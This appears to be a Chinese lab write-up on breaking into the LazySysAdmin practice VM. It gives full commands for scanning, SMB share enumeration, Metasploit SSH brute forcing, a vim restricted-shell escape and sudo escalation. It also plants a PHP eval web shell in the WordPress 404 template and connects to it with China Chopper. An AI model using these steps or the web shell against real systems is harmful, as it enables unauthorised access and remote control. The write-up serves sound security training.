靶机渗透【lazysysadmin】

2022年01月14日 阅读数:3
这篇文章主要向大家介绍靶机渗透【lazysysadmin】,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

一. lazysysadmin靶机安装

1. 下载靶机

  • 百度网盘连接提取码

lazysysadmin.zip
提取码:m02vphp

2. 打开靶机

  • 打开 VMware,在左上角选择 - - 文件 - - 打开
    在这里插入图片描述前端

  • 找到 lazysysadmin 靶机解压位置
    在这里插入图片描述mysql

  • 开启后如图所示
    在这里插入图片描述linux

二. lazysysadmin靶机渗透

  • 开启一台 Kali
    Kali(IP):192.168.110.151

若未安装 Kali 可点击此处进行安装
虚拟机安装【Kali】(2018/2021)web

1. 信息收集

1)扫描IPsql

arp-scan -lshell

发现目标 IP:192.168.110.153
在这里插入图片描述
2)扫描端口数据库

masscan --rate=10000 --ports 0-65535 192.168.110.153vim

发现目标开启 139,6667,3306,22,80,445 端口
在这里插入图片描述
3)扫描服务bash

nmap -T4 -sV -O -p 139,6667,3306,22,80,445 192.168.110.153

发现目标开启 ssh,http,共享,mysql 等服务
在这里插入图片描述
4)扫描域名目录

dirb http://192.168.110.153

发现如下有用信息:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

通过信息收集后,咱们有大体四种思路:Web,共享服务,ssh服务,数据库
如下将从不一样思路切入渗透

2. Web渗透

拿到网站目录后,咱们进行一一查看登陆

1)http://192.168.110.153

浏览后发现没有可用信息
在这里插入图片描述
2)http://192.168.110.153/info.php

发现PHP配置文件
在这里插入图片描述
3)http://192.168.110.153/phpmyadmin/

发现数据库登陆窗口
在这里插入图片描述
4)http://192.168.110.153/robots.txt

这是一个反爬虫网页,一一访问并没有收获
在这里插入图片描述
5)http://192.168.110.153/wordpress/
在这里插入图片描述
发现疑似用户名信息
在这里插入图片描述
点击 Hello world! 字样来到以下界面,观察网址
在这里插入图片描述

6)http://192.168.110.153/wordpress/wp-admin/

进入后台登陆点
在这里插入图片描述

  • 尝试使用弱口令登陆

在这里插入图片描述

  • 利用以前发现的 togie 信息做为用户名再次尝试

在这里插入图片描述

虽然都登陆失败,但结合两次对比,咱们发现用户名为 togie 时,显示无效用户名,但用户名为 admin 时,显示不正确,不难猜出,admin 可能为其一用户名,发现了用户名枚举漏洞

7)http://192.168.110.153/wordpress/wp-includes/

发现一个目录页面
在这里插入图片描述

在 Web 渗透中,咱们发现仍是缺少部分信息,暂时切换思路

3. 共享服务

enum4linux介绍

  • enum.exe的Linux替代软件,用于枚举Windows和Samba主机中的数据
  • 主要特性:
    RID循环(当Windows 2000上的RestrictAnonymous设置为1时)
    用户列表(当Windows 2000上的RestrictAnonymous设置为0时)
    组成员信息列表
    共享枚举
    检测主机是否在工做组或域中
    识别远程操做系统
    密码策略检索(使用polenum)

1)打开新终端

enum4linux 192.168.110.153
在这里插入图片描述
在这里插入图片描述

  • 发现共享登陆为空用户名密码,找到共享路径

在这里插入图片描述
2)使用网络远程挂载

mount -t cifs -o username=' ',password=' ' //192.168.110.153/share$ /media
在这里插入图片描述
3)进入挂载位置查看

cd /media
ls
cat deets.txt
在这里插入图片描述

  • 发现初始备用密码:12345

4. ssh服务

1)准备暴力破解的用户名密码字典

vim user.txt /usr/share/wordlists/dirb

在这里插入图片描述
vim pass.txt /usr/share/wordlists/dirb
在这里插入图片描述
2)进入漏洞库

msfconsole
在这里插入图片描述
3)搜索 ssh 登陆

search ssh_login
在这里插入图片描述
4)拿下路径,暴力破解

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.110.153
set user_file /usr/share/wordlists/dirb/user.txt
set pass_file /usr/share/wordlists/dirb/pass.txt
set verbose true
run
在这里插入图片描述
5)破解成功

togie 12345
在这里插入图片描述
6)链接 ssh

ssh togie@192.168.110.153
12345
在这里插入图片描述
7)查看信息

cat /etc/issue
cd /tmp
在这里插入图片描述

这时咱们发现切换目录收到限制,使用 vim 编译器从新打开一个终端

vim
:set shell=/bin/bash
回车
:shell

发现新开启一行终端

cd /tmp
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
groups
在这里插入图片描述
发现用户拥有 sudo 权限
在这里插入图片描述

sudo su root

使用先前发现的备用密码

12345
在这里插入图片描述

5. 文件上传

回到 /media 终端窗口,查看 wordpress 配置文件

cd wordpress
ls
cat wp-config.php
在这里插入图片描述

发现数据库用户名密码,与咱们先前猜测一致

在这里插入图片描述

返回数据库,登陆

http://192.168.110.153/phpmyadmin/
在这里插入图片描述
在这里插入图片描述

尝试查看数据库信息,惋惜没有读取权限

在这里插入图片描述

想到以前在后台测试点发现的用户名枚举漏洞,用户名正好为 Admin,故尝试相同密码登陆后台,发现登陆成功

http://192.168.110.153/wordpress/wp-admin/
在这里插入图片描述
在这里插入图片描述

寻找信息,在编辑一栏中发现了 404 页面源码,由于 404 页面较隐蔽、为 php 且不肯定其余页面路径,因此咱们在 404 页面上传一句话木马

在这里插入图片描述
<?php @eval($_POST[cmd]);?>
在这里插入图片描述
在这里插入图片描述

接下来只需触发 404 页面便可,在 wordpress 前端界面任意跟连接,找到先前发现的?p=1网页

在这里插入图片描述
成功触发 404 页面,意味着木立刻传成功
在这里插入图片描述

打开中国菜刀工具,进行链接

右键 - 添加 - 复制网址 - 如图选择 - 添加
在这里插入图片描述
在这里插入图片描述
成功链接
在这里插入图片描述